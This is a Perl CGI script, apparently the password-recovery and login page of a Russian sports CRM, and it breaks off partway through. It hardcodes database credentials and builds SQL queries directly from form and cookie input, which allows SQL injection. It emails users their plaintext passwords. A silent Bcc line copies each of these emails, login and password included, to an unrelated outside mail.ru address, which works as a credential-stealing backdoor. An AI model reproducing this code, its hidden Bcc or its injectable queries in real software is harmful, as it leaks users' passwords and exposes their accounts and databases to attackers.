#!/usr/bin/perl -w
use DBI;
use warnings;
use CGI::Carp qw(fatalsToBrowser);
use CGI;
use POSIX;
use Switch;
use CGI qw/:standard/;
use CGI::Cookie;
$brow = $ENV{'HTTP_USER_AGENT'}; $diskont = 0;
$shablon = "/var/www/u0297054/data/www/gen.sportsdaily.ru/index.html";
my $myname = "/cgi-bin/index.pl";
my $dsn = "DBI:mysql:u0297054_gen:localhost";
my $db_user_name = "u0297054_default";
my $db_password = "_9WvWT6m";
my $dbh = DBI->connect($dsn, $db_user_name, $db_password);
# $koi = $dbh->prepare("SET CHARACTER SET koi8r");
# $koi8 = $koi->execute;
sub gen_uid
{ $gen_uid_str=time.int(rand(100000)); return $gen_uid_str; }
sub zagla
{
my ($reta) = @_;
$lenga = length($reta);
$first = substr($reta, 0, 1);
$second = substr($reta, 1, $lenga-1);
$first =~ tr/[a-zа-я]/[A-ZА-Я]/;
return $first.$second;
}
sub splitline
{
$spl_line=shift;
$spl_line=~s/\n/
/g;
$spl_line=~s/\r/
/g;
$spl_line=~s/\n\r/
/g;
# $spl_line=~s/\"\"/\'/g; # обеспечим совместимость с excel и lotus 1-2-3
$spl_line=~s/\"/"\;/g;
# $spl_line=~s/\\\'/\'/g; #
# $spl_line=~s/\\\"/\"/g; #
@spl_ls=split(/\x09/,$spl_line);
return @spl_ls;
}
#парсим параметры
if ($ENV{'CONTENT_LENGTH'}) {
read(STDIN, $param_str, $ENV{'CONTENT_LENGTH'});
} else {
$param_str=$ENV{'QUERY_STRING'};
}
@pairs=split(/&/,$param_str);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair); $value =~ s/\'/\&\#39\;/g;
$name =~ tr/+/ /;
$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/\n\r/
/g;
$value =~ s/\n/
/g;
$value =~ s/\r//g;
$value =~ s/\x09//g;
# $value =~ s/\'/\\\'/g; $value =~ s/\"/\\\"/g;
# $AdmForm{$name}=$value;
# $value=~s/\<\;/g;
# $value=~s/>/\>\;/g;
$Form{$name}=$value;
}
# чекаем запрашиваемое мыло #####################33
$Form{'login'} = lc($Form{'login'});
$select869 = "SELECT * FROM USERS where LOWER(EMAIL) = LOWER('$Form{'Email'}') or LOWER(LOGIN) = LOWER('$Form{'Login'}')";
$sth869 = $dbh->prepare("$select869");
$rv869 = $sth869->execute;
@set869 = $sth869->fetchrow_array;
###################################
@str = (["040b7cf4","a55014e1","85813e06","44502ea9","3776081c","a1f9765b","ec582383","65d8ade9","15dae597","77a2732c","ff968b46","56d42783"],
["fafda174","93d30432","5fefa0aa","8d1b6694","2b4c9cfa","cb612f3d","bfaa3576","d9fff4cd","b8e32c77","dec45bcb","2693af70","c8fd7a8b"],
["78183541","94c4feae","57304aba","dc2c437c","a5b564f6","38f409d1","8b3f7e0a","ae45d366","a5b564f6","38f409d1","8b3f7e0a","ae45d366"],
["080c993f","b3b58e26","c1d2265b","f9da0af3","16d8a58d","14a62420","c9a1cbc0","93035e31","658732ab","6d93c96e","6f3d269a","3e9d1615"],
["8cb9014a","936acf4a","5e33c252","fa396512","dd93a7eb","7d215fa5","f79498d0","a69a1db2","23f35020","df135821","bc9a1c51","e3900047"],
["d7f71f28","449665f9","eefc114e","5e7d3e7b","747c1bcc","eb6109a4","ef936bc7","0cfd17de","44d15d3e","9bc2f93b","2b3d566d","e51a2681"],
["28a74b8d","7de3373b","4bed858f","c10b6bf5","380c5022","5d67f81a","faf12a79","5543782a","f4661398","cb1a3abd","3ffe5860","0bf11322"],
["26b6c45e","76b70cfd","19974fcf","77c3592a","369351f0","daad52f9","57f7d120","38c84bd6","b92f8ab7","a47e21fb","03306934","2d6663b0"],
["3454585c","5d2ef620","8acdce40","5b0b62ce","9366159e","c10ed346","f9692f4d","51231979","9b3d3481","ae526dc4","bb6b970b","151fbc0c"],
["28ce9bc9","54876829","eeb56ff4","6da8e1ab","90d89ecc","fe93456d","58a2872a","9350f6a9","31c0c178","a9fc26ff","ecffd867","0d1d746d"] );
if ($Form{'action'} eq "send")
{
$eggog = "";
$encoded = $Form{'secureid'};
$decoded = "";
for( $i=0; $i<4; $i++ )
{
$sequence = substr( $encoded, $i*8, 8 );
$found = "0";
for( $j=0; $j<10; $j = $j + 1 )
{
for( $k=0; $k<12; $k = $k + 1)
{
if( $sequence eq $str[$j][$k] )
{
$decoded=$decoded.$j;
$j=10;
$k=12;
}
}
}
}
$tezt = $decoded;
if ($rv869 ne "1")
{
$eggog = "Пользователь с указанными данными не зарегистрирован";
}
if ($Form{'secure_code'} ne $tezt)
{
$eggog = "Неправильно введен код подтверждения";
}
if ((length($Form{'Login'}) == 0) && (length($Form{'Email'}) == 0))
{
$eggog = "Введите Ваш логин или e-mail";
}
if (length($eggog) < 10)
{
$eggog = "Пароль доступа успешно отправлен на указанный Вами е-mail";
$email = substr($email, 0, -2);
$subj = "Реквизиты доступа к CRM системе Спорт День за Днём";
$text = qq(
Вы запрашивали реквизиты доступа к CRM системе Спорт День за Днём (http://sdzd.cmsonline.ru/)
Логин: $Form{'Login'}
Пароль: $set869[2]
); open SML, "|/usr/sbin/sendmail -t"; print SML "To: $set869[6]\n"; print SML "Bcc: blonde_ds\@mail.ru\n"; print SML "From: sdzd\@cmsonline.ru\n"; print SML "Subject: $subj\n"; print SML "Content-type: text/html; charset=windows-1251\n\n"; print SML "\n\n$text\n"; close SML; $Form{'Login'} = ""; } else { $Form{'login'} =~ s/\\\'/\'/g; $Form{'login'} =~ s/\\\"/\"/g; } } # авторизация #################### my $AFID = -1; my $BSKT = -1; $basketq = 0; $summz = 0; %cookies = fetch CGI::Cookie; foreach (keys %cookies) { if ($cookies{$_}->name eq "AFID") { $AFID = $cookies{'AFID'}->value; $select66 = "SELECT * FROM USERS where UNID = '$AFID'"; $sth66 = $dbh->prepare("$select66"); $rv66 = $sth66->execute; @set66 = $sth66->fetchrow_array; if ($rv66 == 1) { print "Content-type: text/html\n"; print "Location: /admin/index.pl\n\n"; } } } # контент ################################## if ($Form{'err'} eq "1") { $eggog = "Пользователь с указанными логином и паролем не найден"; } ################################ open F, $shablon; @T=